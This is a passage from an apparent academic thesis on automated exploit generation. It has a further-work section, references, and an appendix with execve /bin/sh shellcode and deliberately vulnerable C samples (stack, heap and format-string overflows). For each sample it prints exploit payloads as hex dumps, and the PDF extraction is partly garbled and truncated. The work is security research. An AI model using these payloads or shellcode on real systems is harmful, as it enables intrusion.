Further Work

To perfect the automated exploit generation, many further work can be implemented as follow.

• A more perfect end-to-end system

– Real-world programs usually are released in the form of binary executables without source code. In order to operate on binaries directly, many input sources must be handled, such as standard input, environment variables, sockets, and files. There-fore, this is an important further work to generate exploits for more real-world ap-plications.

• Exploit generation for other operating systems

– For example, Windows is the most common operating system on personal comput-ers, so exploit generation for Windows applications is very useful. Fortunately, our method is most suitable for other operating systems. The differences are memory layout and protection mechanisms for different systems. For example, Windows re-serves 2 GB space for kernel, but Linux only rere-serves 1 GB. Therefore, the search range of memory for shellcode injection is different from Linux.

• More types of exploits

– As we tried to generate return-to-lib and jump-to-register exploits, other types of exploits can attack other different protections. For example, return-oriented pro-gramming is a technique to bypass ASLR and W⊕X without shellcode. In addition, shellocde design is also useful for exploits. For example, it is very powerful that shellcode is divided into many small parts, and injected to different regions. Even if there is no any symbolic block in memory large enough to injection a complete shellcode, this skill makes the exploits still work by chaining those small parts of shellcode together.

References

[1] T. Wang, T. Wei, Z. Lin, and W. Zou, “IntScope: Automatically Detecting Integer Over-flow Vulnerability in X86 Binary Using Symbolic Execution,” in Proceedings of the Network and Distributed System Security Symposium (NDSS’09), San Diego, California, USA, February 2009.

[2] D. Molnar, X. C. Li, and D. Wagner, “Dynamic Test Generation to Find Integer Bugs in x86 Binary Linux Programs,” in Proceedings of the 18th USENIX Security Symposium, Montreal, Canada, August 2009, pp. 67–82.

[3] C. Cadar and D. R. Engler, “Execution Generated Test Cases: How to Make Systems Code Crash Itself,” in Proceedings of the 12th International SPIN Workshop on Model Checking Software, San Francisco, CA, USA, August 2005, pp. 2–23.

[4] C. S. P˘as˘areanu and W. Visser, “A survey of new trends in symbolic execution for software testing and analysis,” International Journal on Software Tools for Technology Transfer (STTT), vol. 11, no. 4, pp. 339–353, 2009.

[5] E. J. Schwartz, T. Avgerinos, and D. Brumley, “All You Ever Wanted to Know about Dynamic Taint Analysis and Forward Symbolic Execution (but Might Have Been Afraid to Ask),” in Proceedings of the 31st IEEE Symposium on Security and Privacy (S&P 2010), Berleley/Oakland, California, USA, May 2010, pp. 317–331.

[6] C. Cadar, P. Godefroid, S. Khurshid, C. S. P˘as˘areanu, K. Sen, N. Tillmann, and W. Visser,

“Symbolic execution for software testing in practice: preliminary assessment,” in Proceed-ings of the 33rd International Conference on Software Engineering (ICSE’11), Waikiki, Honolulu , HI, USA, May 2011, pp. 1066–1071.

[7] P. Godefroid, N. Klarlund, and K. Sen, “DART: directed automated random testing,” in Proceedings of the ACM SIGPLAN 2005 Conference on Programming Language Design and Implementation (PLDI’05), Chicago, IL, USA, June 2005, pp. 213–223.

[8] K. Sen, D. Marinov, and G. Agha, “CUTE: a concolic unit testing engine for C,” in Pro-ceedings of the 10th European Software Engineering Conference held jointly with 13th ACM SIGSOFT International Symposium on Foundations of Software Engineering (ES-EC/SIGSOFT FSE’05), Lisbon, Portugal, September 2005, pp. 263–272.

[9] P. Godefroid, M. Y. Levin, and D. A. Molnar, “Automated Whitebox Fuzz Testing,” in Proceedings of the Network and Distributed System Security Symposium (NDSS’08), San Diego, California, USA, February 2008.

[10] D. A. Molnar and D. Wagner, “Catchconv: Symbolic execution and run-time type infer-ence for integer conversion errors,” EECS Department, University of California, Berkeley, Tech. Rep. UCB/EECS-2007-23, February 2007.

[11] N. Nethercote and J. Seward, “Valgrind: a framework for heavyweight dynamic binary instrumentation,” in Proceedings of the ACM SIGPLAN 2007 Conference on Program-ming Language Design and Implementation (PLDI’07), San Diego, California, USA, June 2007, pp. 89–100.

[12] C. Cadar, D. Dunbar, and D. R. Engler, “KLEE: Unassisted and Automatic Generation of High-Coverage Tests for Complex Systems Programs,” in Proceedings of the 8th USENIX Symposium on Operating Systems Design and Implementation (OSDI’08), San Diego, Cal-ifornia, USA, December 2008, pp. 209–224.

[13] C. Cadar, V. Ganesh, P. M. Pawlowski, D. L. Dill, and D. R. Engler, “EXE: automatically generating inputs of death,” in Proceedings of the 13th ACM Conference on Computer and Communications Security(CCS’06), Alexandria, VA, USA, October - November 2006, pp.

322–335.

[14] C. Lattner and V. S. Adve, “LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation,” in Proceedings of the 2nd IEEE / ACM International Sympo-sium on Code Generation and Optimization (CGO’04), San Jose, CA, USA, March 2004, pp. 75–88.

[15] R. A. Santelices and M. J. Harrold, “Exploiting program dependencies for scalable multiple-path symbolic execution,” in Proceedings of the Nineteenth International Sympo-sium on Software Testing and Analysis (ISSTA’10), Trento, Italy, July 2010, pp. 195–206.

[16] P. Boonstoppel, C. Cadar, and D. R. Engler, “RWset: Attacking Path Explosion in Constraint-Based Test Generation,” in Proceedings of the 14th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS’08), Bu-dapest, Hungary, March - April 2008, pp. 351–366.

[17] M. Delahaye, B. Botella, and A. Gotlieb, “Explanation-Based Generalization of Infeasible Path,” in Proceedings of the Third International Conference on Software Testing, Verifica-tion and ValidaVerifica-tion (ICST’10), Paris, France, April 2010, pp. 215–224.

[18] S. Bardin and P. Herrmann, “Pruning the Search Space in Path-Based Test Generation,” in Proceedings of the Second International Conference on Software Testing Verification and Validation (ICST’09), Denver, Colorado, USA, April 2009, pp. 240–249.

[19] V. Ganesh and D. L. Dill, “A Decision Procedure for Bit-Vectors and Arrays,” in Pro-ceedings of the 19th International Conference on Computer Aided Verification (CAV’07), Berlin, Germany, July 2007, pp. 519–531.

[20] C. Barrett and C. Tinelli, “CVC3,” in Proceedings of the 19th International Conference on Computer Aided Verification (CAV’07), Berlin, Germany, July 2007, pp. 298–302.

[21] B. Dutertre and L. de Moura, “The Yices SMT solver,” Computer Science Laboratory, SRI International, Tech. Rep., August 2006.

[22] L. M. de Moura and N. Bjørner, “Z3: An Efficient SMT Solver,” in Proceedings of the 14th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS’08), Budapest, Hungary, March - April 2008, pp. 337–340.

[23] A. Kiezun, V. Ganesh, P. J. Guo, P. Hooimeijer, and M. D. Ernst, “HAMPI: a solver for string constraints,” in Proceedings of the Eighteenth International Symposium on Software Testing and Analysis (ISSTA’09), Chicago, IL, USA, July 2009, pp. 105–116.

[24] J. Caballero, P. Poosankam, S. McCamant, D. Babi´c, and D. Song, “Input generation via decomposition and re-stitching: finding bugs in Malware,” in Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS’10), Chicago, Illinois, USA, October 2010, pp. 413–425.

[25] L. Ciortea, C. Zamfir, S. Bucur, V. Chipounov, and G. Candea, “Cloud9: a software testing service,” Operating Systems Review, vol. 43, no. 4, pp. 5–10, 2009.

[26] S. Bucur, V. Ureche, C. Zamfir, and G. Candea, “Parallel symbolic execution for auto-mated real-world software testing,” in Proceedings of the sixth conference on Computer systems (EuroSys ’11), Salzburg, Austria, April 2011, pp. 183–198.

[27] D. Brumley, P. Poosankam, D. X. Song, and J. Zheng, “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications,” in Proceedings of the 2008 IEEE Symposium on Security and Privacy (S&P 2008), Oakland, California, USA, May 2008, pp. 143–157.

[28] T. Avgerinos, S. K. Cha, B. L. T. Hao, and D. Brumley, “AEG: Automatic Exploit Generation,” in Proceedings of the Network and Distributed System Security Symposium (NDSS’11), San Diego, California, USA, February 2011.

[29] E. J. Schwartz, T. Avgerinos, and D. Brumley, “Q: Exploit Hardening Made Easy,” in Proceedings of the 20th USENIX Security Symposium (USENIX’11), San Francisco, CA, USA, August 2011.

[30] S. Heelan and D. Kroening, “Automatic Generation of Control Flow Hijacking Exploits for Software Vulnerabilities,” MSc Computer Science Dissertation, University of Oxford, UK, 2009.

[31] C. Miller, J. Caballero, N. M. Johnson, M. G. Kang, S. McCamant, P. Poosankam, and D. Song, “Crash Analysis using BitBlaze,” in Proceedings of the Black Hat USA 2010, Las Vegas, US, July 2010.

[32] V. Chipounov, V. Kuznetsov, and G. Candea, “S2E: a platform for in-vivo multi-path anal-ysis of software systems,” in Proceedings of the 16th International Conference on Ar-chitectural Support for Programming Languages and Operating Systems (ASPLOS’11), Newport Beach, CA, USA, March 2011, pp. 265–278.

[33] F. Bellard, “QEMU, a fast and portable dynamic translator,” in Proceedings of the FREENIX Track: 2005 USENIX Annual Technical Conference, Anaheim, CA, USA, April 2005, pp. 41–46.

[34] V. Chipounov and G. Candea, “Dynamically Translating x86 to LLVM using QEMU,”

School of Computer and Communication Sciences, ´Ecole Polytechnique F´ed´erale de Lau-sanne (EPFL), Switzerland, Tech. Rep. EPFL-TR-149975, March 2010.

[35] V. Chipounov, V. Georgescu, C. Zamfir, and G. Candea, “Selective Symbolic Execution,”

in Proceedings of the 5th Workshop on Hot Topics in System Dependability (HotDep), Lisbon, Portugal, June 2009.

Appendix A

Sample Code and Exploits

A.1 Shellcode

Listing 10: The used shellcode

1 00000000 31 c0 89 c2 50 68 6 e 2 f 73 68 68 2 f 2 f 62 69 89 | 1 . . . Phn / s h h / / b i . | 2 00000010 e3 89 c1 b0 0 b 52 51 53 89 e1 cd 80 | . . . RQS . . . . | 3 0000001 c

A.2 Stack Buffer Overflow Vulnerability

Listing 11: A sample code for stack buffer overflow vulnerability 1 # i n c l u d e < s t d i o . h>

2 # i n c l u d e < s t r i n g . h>

3

4 v o i d a ( c h a r ∗ a r g v ) 5 {

6 c h a r b u f [ 5 0 ] ; 7

8 s t r c p y ( b u f , a r g v ) ; 9 }

10

11 i n t main ( i n t a r g c , c h a r ∗∗ a r g v ) 12 {

13 i f ( a r g c > 1 ) 14 a ( a r g v [ 1 ] ) ; 15

16 r e t u r n 0 ; 17 }

Listing 12: A return-to-stack exploit for Listing 11

1 00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | . . . | 2 00000010 90 90 90 90 90 90 31 c0 89 c2 50 68 6 e 2 f 73 68 | . . . 1 . . . Phn / s h | 3 00000020 68 2 f 2 f 62 69 89 e3 89 c1 b0 0 b 52 51 53 89 e1 | h / / b i . . . RQS . . | 4 00000030 cd 80 8 f f a f f b f 9 a f a f f b f 01 01 01 01 01 01 | . . . | 5 00000040 01 01 01 01 01 01 01 01 02 01 01 01 01 01 01 01 | . . . | 6 00000050 01 01 01 01 01 01 01 01 01 01 01 02 01 01 01 01 | . . . |

7 00000060 01 01 01 02 | . . . . |

8 00000064

Listing 13: A return-to-libc exploit for Listing 11

1 00000000 88 02 01 01 02 01 01 04 01 01 01 01 01 01 01 01 | . . . | 2 00000010 01 01 01 01 01 01 01 01 01 01 02 01 01 01 01 01 | . . . | 3 00000020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 | . . . | 4 00000030 01 01 8 f f a f f b f a0 b7 eb b7 01 01 01 01 d f f a | . . . | 5 00000040 f f b f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 | . . | 6 00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 2 f 62 69 | / b i |

7 00000060 6 e 2 f 73 68 | n / s h |

8 00000064

Listing 14: A jump-to-register exploit for Listing 11

1 00000000 31 c0 89 c2 50 68 6 e 2 f 73 68 68 2 f 2 f 62 69 89 | 1 . . . Phn / s h h / / b i . | 2 00000010 e3 89 c1 b0 0 b 52 51 53 89 e1 cd 80 02 02 01 01 | . . . RQS . . . | 3 00000020 01 01 02 01 01 02 01 01 01 01 01 01 01 01 01 01 | . . . | 4 00000030 01 01 8 f f a f f b f 9 f 83 04 08 01 01 01 01 02 01 | . . . | 5 00000040 01 01 01 01 01 01 01 01 01 02 01 01 01 01 01 01 | . . . | 6 00000050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 | . . . | 7 ∗

8 00000060

A.3 Heap Buffer Overflow Vulnerability

Listing 15: A sample code for heap buffer overflow vulnerability 1 # i n c l u d e < s t d l i b . h>

2 # i n c l u d e < s t r i n g . h>

3

4 v o i d a ( c h a r ∗ a r g v ) 5 {

6 c h a r ∗ f i r s t , ∗ s e c o n d ; 7

8 f i r s t = m a l l o c ( 8 0 ) ; 9 s e c o n d = m a l l o c ( 8 0 ) ; 10 s t r c p y ( f i r s t , a r g v ) ; 11 f r e e ( f i r s t ) ;

12 f r e e ( s e c o n d ) ; 13 }

14

15 i n t main ( i n t a r g c , c h a r ∗∗ a r g v ) 16 {

17 i f ( a r g c > 1 ) 18 a ( a r g v [ 1 ] ) ; 19

20 r e t u r n ( 0 ) ; 21 }

Listing 16: An exploit for Listing 15

1 00000000 88 01 01 02 01 01 01 01 01 01 01 01 01 01 01 01 | . . . | 2 00000010 01 01 04 01 01 01 01 02 01 01 01 01 01 01 02 01 | . . . | 3 00000020 01 01 01 01 01 01 02 01 01 01 01 eb 0 a 90 90 90 | . . . | 4 00000030 90 90 90 90 90 90 90 31 c0 89 c2 50 68 6 e 2 f 73 | . . . 1 . . . Phn / s | 5 00000040 68 68 2 f 2 f 62 69 89 e3 89 c1 b0 0 b 52 51 53 89 | hh / / b i . . . RQS . | 6 00000050 e1 cd 80 02 f c f f f f f f a4 f a f f b f 92 f c f f b f | . . . |

7 00000060 01 01 01 40 | . . . @|

8 00000064

A.4 Off-by-one Buffer Overflow Vulnerability

Listing 17: A sample code for off-by-one buffer overflow vulnerability 1 # i n c l u d e < s t d i o . h>

Listing 18: An exploit for Listing 17

1 00000000 8 f f a f f b f ad f a f f b f 90 90 90 90 90 90 90 90 | . . . |

A.5 Uninitialized Variable Vulnerability

Listing 19: A sample code for uninitialized variables vulnerability 1 # i n c l u d e < s t d i o . h>

Listing 20: An exploit for Listing 19

1 00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | . . . |

A.6 Format String Vulnerability

Listing 21: A sample code for format string vulnerability 1 # i n c l u d e < s t d i o . h>

2

3 v o i d a ( c h a r ∗ a r g v ) 4 {

5 c h a r f m t [ 1 0 0 ] ; 6

7 s n p r i n t f ( fmt , s i z e o f ( f m t ) , a r g v ) ; 8 p r i n t f ( ”%s ” , f m t ) ;

9 } 10

11 i n t main ( i n t a r g c , c h a r ∗∗ a r g v ) 12 {

13 i f ( a r g c > 1 ) 14 a ( a r g v [ 1 ] ) ; 15

16 r e t u r n 0 ; 17 }

Listing 22: An exploit for Listing 21

1 00000000 14 96 04 08 15 96 04 08 16 96 04 08 17 96 04 08 | . . . | 2 00000010 25 34 34 36 78 25 37 24 6 e 25 33 30 30 78 25 38 |%446 x%7$n%300x%8|

3 00000020 24 6 e 25 32 36 31 78 25 39 24 6 e 25 31 39 32 78 | $n%261x%9$n%192x | 4 00000030 25 31 30 24 6 e 90 90 90 90 90 90 90 90 90 90 90 |%10 $n . . . | 5 00000040 90 90 90 90 90 90 90 90 31 c0 89 c2 50 68 6 e 2 f | . . . 1 . . . Phn / | 6 00000050 73 68 68 2 f 2 f 62 69 89 e3 89 c1 b0 0 b 52 51 53 | s h h / / b i . . . RQS |

7 00000060 89 e1 cd 80 | . . . . |

8 00000064